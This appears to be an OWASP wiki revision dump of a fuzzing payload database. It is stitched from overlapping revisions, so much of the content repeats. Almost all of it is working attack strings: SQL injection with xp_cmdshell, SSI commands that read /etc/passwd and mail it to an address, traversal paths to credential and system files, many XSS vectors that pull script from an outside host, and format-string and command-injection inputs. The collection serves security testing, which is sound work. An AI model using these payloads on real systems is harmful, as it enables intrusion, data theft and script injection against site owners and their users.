%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
../../../.htaccess<br />
../../.htaccess<br />
../.htaccess<br />
.htaccess<br />
././.htaccess<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%68%74%61%63%63%65%73%73<br />
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
</pre><br />
''Sorry for breaking the layout - but "breaking the layout" could become "breaking the software".''<br />
<br />
=== XSS Statements ===<br />
<br />
<pre><br />
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> <br />
'';!--"<XSS>=&{()}<br />
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT><br />
<IMG SRC="javascript:alert('XSS');"><br />
<IMG SRC=javascript:alert('XSS')><br />
<IMG SRC=JaVaScRiPt:alert('XSS')><br />
<IMG SRC=javascript:alert(&quot;XSS&quot;)><br />
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`><br />
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"><br />
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))><br />
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;><br />
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041><br />
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29><br />
<IMG SRC="jav ascript:alert('XSS');"><br />
<IMG SRC="jav&#x09;ascript:alert('XSS');"><br />
<IMG SRC="jav&#x0A;ascript:alert('XSS');"><br />
<IMG SRC="jav&#x0D;ascript:alert('XSS');"><br />
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out<br />
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out<br />
<IMG SRC=" &#14; javascript:alert('XSS');"><br />
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT><br />
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")><br />
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT><br />
<<SCRIPT>alert("XSS");//<</SCRIPT><br />
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B><br />
<SCRIPT SRC=//ha.ckers.org/.j><br />
<IMG SRC="javascript:alert('XSS')"<br />
<iframe src=http://ha.ckers.org/scriptlet.html <<br />
<SCRIPT>a=/XSS/\nalert(a.source)</SCRIPT><br />
\";alert('XSS');//<br />
</TITLE><SCRIPT>alert("XSS");</SCRIPT><br />
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"><br />
<BODY BACKGROUND="javascript:alert('XSS')"><br />
<BODY ONLOAD=alert('XSS')><br />
<IMG DYNSRC="javascript:alert('XSS')"><br />
<IMG LOWSRC="javascript:alert('XSS')"><br />
<BGSOUND SRC="javascript:alert('XSS');"><br />
<BR SIZE="&{alert('XSS')}"><br />
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER><br />
<LINK REL="stylesheet" HREF="javascript:alert('XSS');"><br />
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"><br />
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE><br />
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"><br />
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE><br />
<XSS STYLE="behavior: url(xss.htc);"><br />
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS<br />
<IMG SRC='vbscript:msgbox("XSS")'><br />
¼script¾alert(¢XSS¢)¼/script¾<br />
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"><br />
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"><br />
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"><br />
<IFRAME SRC="javascript:alert('XSS');"></IFRAME><br />
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET><br />
<TABLE BACKGROUND="javascript:alert('XSS')"><br />
<TABLE><TD BACKGROUND="javascript:alert('XSS')"><br />
<DIV STYLE="background-image: url(javascript:alert('XSS'))"><br />
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"><br />
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"><br />
<DIV STYLE="width: expression(alert('XSS'));"><br />
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE><br />
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"><br />
<XSS STYLE="xss:expression(alert('XSS'))"><br />
exp/*<A STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'><br />
<STYLE TYPE="text/javascript">alert('XSS');</STYLE><br />
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A><br />
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE><br />
<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]--><br />
<BASE HREF="javascript:alert('XSS');//"><br />
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT><br />
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT><br />
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED><br />
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED><br />
<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML><br />
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN><br />
<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('XSS')"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN><br />
<XML SRC="xsstest.xml" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN><br />
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;"></BODY></HTML><br />
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT><br />
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--><br />
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?><br />
<META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;"><br />
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-<br />
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT><br />
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT><br />
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT><br />
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT><br />
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT><br />
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT><br />
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT><br />
<A HREF="http://66.102.7.147/">XSS</A><br />
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A><br />
<A HREF="http://1113982867/">XSS</A><br />
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A><br />
<A HREF="http://0102.0146.0007.00000223/">XSS</A><br />
<A HREF="h\ntt\tp://6&#9;6.000146.0x7.147/">XSS</A><br />
<A HREF="//www.google.com/">XSS</A><br />
<A HREF="//google">XSS</A><br />
<A HREF="http://google.com/">XSS</A><br />
<A HREF="http://www.google.com./">XSS</A><br />
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A><br />
<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A><br />
<a href="javas&#99;ript&#35;document.write("XSS-XSS-XSS");"><br />
<a href="javas&#99;ript&#35;document.write("XSS-XSS-XSS");"><br />
<div onmouseover="document.write("XSS-XSS-XSS");"><br />
<img src="javascript:document.write("XSS-XSS-XSS");"><br />
<img dynsrc="javascript:document.write("XSS-XSS-XSS");"><br />
<input type="image" dynsrc="javascript:document.write("XSS-XSS-XSS");"><br />
<bgsound src="javascript:document.write("XSS-XSS-XSS");"><br />
&<script>document.write("XSS-XSS-XSS");</script><br />
&{document.write("XSS-XSS-XSS");};<br />
<img src=&{document.write("XSS-XSS-XSS");};><br />
<link rel="stylesheet" href="javascript:document.write("XSS-XSS-XSS");"><br />
<iframe src="vbscript:document.write("XSS-XSS-XSS");"><br />
<img src="mocha:document.write("XSS-XSS-XSS");"><br />
<img src="livescript:document.write("XSS-XSS-XSS");"><br />
<a href="about:<s&#99;ript>document.write("XSS-XSS-XSS");</script>"><br />
<meta http-equiv="refresh" content="0;url=javascript:document.write("XSS-XSS-XSS");"><br />
<body onload="document.write("XSS-XSS-XSS");"><br />
<div style="background-image: url(javascript:document.write("XSS-XSS-XSS"););"><br />
<div style="behaviour: url([link to code]);"><br />
<div style="binding: url([link to code]);"><br />
<div style="width: expression(document.write("XSS-XSS-XSS"););"><br />
<style type="text/javascript">document.write("XSS-XSS-XSS");</style><br />
<object classid="clsid:..." codebase="javascript:document.write("XSS-XSS-XSS");"><br />
<style><!--</style><script>document.write("XSS-XSS-XSS");//--></script><br />
<![CDATA[<!--]]><script>document.write("XSS-XSS-XSS");//--></script><br />
<!-- -- --><script>document.write("XSS-XSS-XSS");</script><!-- -- --><br />
<<script>document.write("XSS-XSS-XSS");</script><br />
<img src="blah"onmouseover="document.write("XSS-XSS-XSS");"><br />
<img src="blah>" onmouseover="document.write("XSS-XSS-XSS");"><br />
<xml src="javascript:document.write("XSS-XSS-XSS");"><br />
<xml id="X"><a><b>&lt;script>document.write("XSS-XSS-XSS");&lt;/script>;</b></a></xml><br />
<div datafld="b" dataformatas="html" datasrc="#X"></div><br />
<a href="javas&#99;ript&#35;document.write("XSS-XSS-XSS");"><br />
<div onmouseover="document.write("XSS-XSS-XSS");"><br />
<img src="javascript:document.write("XSS-XSS-XSS");"><br />
<img dynsrc="javascript:document.write("XSS-XSS-XSS");"><br />
<input type="image" dynsrc="javascript:document.write("XSS-XSS-XSS");"><br />
<bgsound src="javascript:document.write("XSS-XSS-XSS");"><br />
&<script>document.write("XSS-XSS-XSS");</script><br />
&{document.write("XSS-XSS-XSS");};<br />
<img src=&{document.write("XSS-XSS-XSS");};><br />
<link rel="stylesheet" href="javascript:document.write("XSS-XSS-XSS");"><br />
<iframe src="vbscript:document.write("XSS-XSS-XSS");"><br />
<img src="mocha:document.write("XSS-XSS-XSS");"><br />
<img src="livescript:document.write("XSS-XSS-XSS");"><br />
<a href="about:<s&#99;ript>document.write("XSS-XSS-XSS");</script>"><br />
<meta http-equiv="refresh" content="0;url=javascript:document.write("XSS-XSS-XSS");"><br />
<body onload="document.write("XSS-XSS-XSS");"><br />
<div style="background-image: url(javascript:document.write("XSS-XSS-XSS"););"><br />
<div style="behaviour: url([link to code]);"><br />
<div style="binding: url([link to code]);"> [Mozilla]<br />
<div style="width: expression(document.write("XSS-XSS-XSS"););"><br />
<style type="text/javascript">document.write("XSS-XSS-XSS");</style><br />
<object classid="clsid:..." codebase="javascript:document.write("XSS-XSS-XSS");"><br />
<style><!--</style><script>document.write("XSS-XSS-XSS");//--></script><br />
<![CDATA[<!--]]><script>document.write("XSS-XSS-XSS");//--></script><br />
<!-- -- --><script>document.write("XSS-XSS-XSS");</script><!-- -- --><br />
<<script>document.write("XSS-XSS-XSS");</script><br />
<img src="blah"onmouseover="document.write("XSS-XSS-XSS");"><br />
<img src="blah>" onmouseover="document.write("XSS-XSS-XSS");"><br />
<xml src="javascript:document.write("XSS-XSS-XSS");"><br />
<xml id="X"><a><b>&lt;script>document.write("XSS-XSS-XSS");&lt;/script>;</b></a></xml><br />
<div datafld="b" dataformatas="html" datasrc="#X"></div><br />
[\xC0][\xBC]script>document.write("XSS-XSS-XSS");[\xC0][\xBC]/script><br />
</pre><br />
<br />
=== Format String Statements ===<br />
<br />
<pre><br />
%s%p%x%d<br />
.1024d<br />
%.2049d<br />
%p%p%p%p<br />
%x%x%x%x<br />
%d%d%d%d<br />
%s%s%s%s<br />
%99999999999s<br />
%08x<br />
%%20d<br />
%%20n<br />
%%20x<br />
%%20s<br />
%s%s%s%s%s%s%s%s%s%s<br />
%p%p%p%p%p%p%p%p%p%p<br />
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%<br />
f(x)=%s x 123<br />
f(x)=%x x 255<br />
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x<br />
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s<br />
XXXXX.%p<br />
XXXXX`perl -e 'print ".%p" x 80'`<br />
`perl -e 'print ".%p" x 80'`%n<br />
%08x.%08x.%08x.%08x.%08x\n<br />
XXX0_%08x.%08x.%08x.%08x.%08x\n<br />
%.16705u%2\$hn<br />
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|<br />
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id > /tmp/file; exit;<br />
</pre></div>
Foobar23
https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&diff=20479
Category:OWASP Fuzzing Code Database
2007-07-30T13:58:59Z
<p>Foobar23: </p>
<hr />
<div>This database is a collection of several statements used in code injection software. All to often security professionals use their own repositories of statements collected from several projects for a long time. We want to collect all these statements - compose them - merging the database of several projects like [[WebScarab]] and [[JBroFuzz]] gaining a big dataset of effective statements to provide better testing results.<br />
Please add your own statements and check the statements already added. <br />
<br />
=== SQL Injection Statements ===<br />
<br />
<pre><br />
'sqlvuln<br />
'+sqlvuln<br />
sqlvuln;<br />
(sqlvuln)<br />
a' or 1=1--<br />
a" or 1=1--<br />
" or "a" = "a<br />
a' or 'a' = 'a<br />
1 or 1=1<br />
a' waitfor delay '0:0:10'--<br />
1 waitfor delay '0:0:10'--<br />
declare @q nvarchar (4000) select @q =<br />
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A<br />
0<br />
031003000270000<br />
declare @s varchar(22) select @s =<br />
0x77616974666F722064656C61792027303A303A31302700 exec(@s)<br />
declare @q nvarchar (4000) select @q =<br />
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)<br />
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e<br />
exec(@s)<br />
a'<br />
?<br />
' or 1=1<br />
‘ or 1=1 --<br />
x' AND userid IS NULL; --<br />
x' AND email IS NULL; --<br />
anything' OR 'x'='x<br />
x' AND 1=(SELECT COUNT(*) FROM tabname); --<br />
x' AND members.email IS NULL; --<br />
x' OR full_name LIKE '%Bob%<br />
23 OR 1=1<br />
'; exec master..xp_cmdshell 'ping 172.10.1.255'--<br />
</pre><br />
<br />
=== SSI (Server Side Includes) Statements ===<br />
<br />
<pre><br />
<!--#exec cmd="/bin/ls /" --><br/><br />
<!--#exec cmd="cat /etc/passwd" --><br/><br />
<!--#exec cmd="find / -name *.* -print" --><br/><br />
<!--#exec cmd="mail Foobar@email.de <mailto:Foobar@email.de> < cat /etc/passwd" --><br/><br />
</pre><br />
<br />
=== Directory Traversal Statements ===<br />
<br />
<pre><br />
\..\WINDOWS\win.ini<br />
\..\..\WINDOWS\win.ini<br />
\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\..\..\WINDOWS\win.ini<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
../../../../../../../../../etc/passwd<br />
../../../../../../../../etc/passwd<br />
../../../../../../../etc/passwd<br />
../../../../../../etc/passwd<br />
../../../../../etc/passwd<br />
../../../../etc/passwd<br />
../../../etc/passwd<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
../../../.htaccess<br />
../../.htaccess<br />
../.htaccess<br />
.htaccess<br />
././.htaccess<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%68%74%61%63%63%65%73%73<br />
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
</pre><br />
''Sorry for breaking the layout - but "breaking the layout" could become "breaking the software".''<br />
<br />
=== XSS Statements ===<br />
<br />
<pre><br />
<a href="javas&#99;ript&#35;[code]"><br />
<a href="javas&#99;ript&#35;[code]"><br />
<div onmouseover="[code]"><br />
<img src="javascript:[code]"><br />
<img dynsrc="javascript:[code]"><br />
<input type="image" dynsrc="javascript:[code]"><br />
<bgsound src="javascript:[code]"><br />
&<script>[code]</script><br />
&{[code]};<br />
<img src=&{[code]};><br />
<link rel="stylesheet" href="javascript:[code]"><br />
<iframe src="vbscript:[code]"><br />
<img src="mocha:[code]"><br />
<img src="livescript:[code]"><br />
<a href="about:<s&#99;ript>[code]</script>"><br />
<meta http-equiv="refresh" content="0;url=javascript:[code]"><br />
<body onload="[code]"><br />
<div style="background-image: url(javascript:[code]);"><br />
<div style="behaviour: url([link to code]);"><br />
<div style="binding: url([link to code]);"><br />
<div style="width: expression([code]);"><br />
<style type="text/javascript">[code]</style><br />
<object classid="clsid:..." codebase="javascript:[code]"><br />
<style><!--</style><script>[code]//--></script><br />
<![CDATA[<!--]]><script>[code]//--></script><br />
<!-- -- --><script>[code]</script><!-- -- --><br />
<<script>[code]</script><br />
<img src="blah"onmouseover="[code]"><br />
<img src="blah>" onmouseover="[code]"><br />
<xml src="javascript:[code]"><br />
<xml id="X"><a><b>&lt;script>[code]&lt;/script>;</b></a></xml><br />
<div datafld="b" dataformatas="html" datasrc="#X"></div><br />
<a href="javas&#99;ript&#35;[code]"><br />
<div onmouseover="[code]"><br />
<img src="javascript:[code]"><br />
<img dynsrc="javascript:[code]"><br />
<input type="image" dynsrc="javascript:[code]"><br />
<bgsound src="javascript:[code]"><br />
&<script>[code]</script><br />
&{[code]};<br />
<img src=&{[code]};><br />
<link rel="stylesheet" href="javascript:[code]"><br />
<iframe src="vbscript:[code]"><br />
<img src="mocha:[code]"><br />
<img src="livescript:[code]"><br />
<a href="about:<s&#99;ript>[code]</script>"><br />
<meta http-equiv="refresh" content="0;url=javascript:[code]"><br />
<body onload="[code]"><br />
<div style="background-image: url(javascript:[code]);"><br />
<div style="behaviour: url([link to code]);"><br />
<div style="binding: url([link to code]);"> [Mozilla]<br />
<div style="width: expression([code]);"><br />
<style type="text/javascript">[code]</style><br />
<object classid="clsid:..." codebase="javascript:[code]"><br />
<style><!--</style><script>[code]//--></script><br />
<![CDATA[<!--]]><script>[code]//--></script><br />
<!-- -- --><script>[code]</script><!-- -- --><br />
<<script>[code]</script><br />
<img src="blah"onmouseover="[code]"><br />
<img src="blah>" onmouseover="[code]"><br />
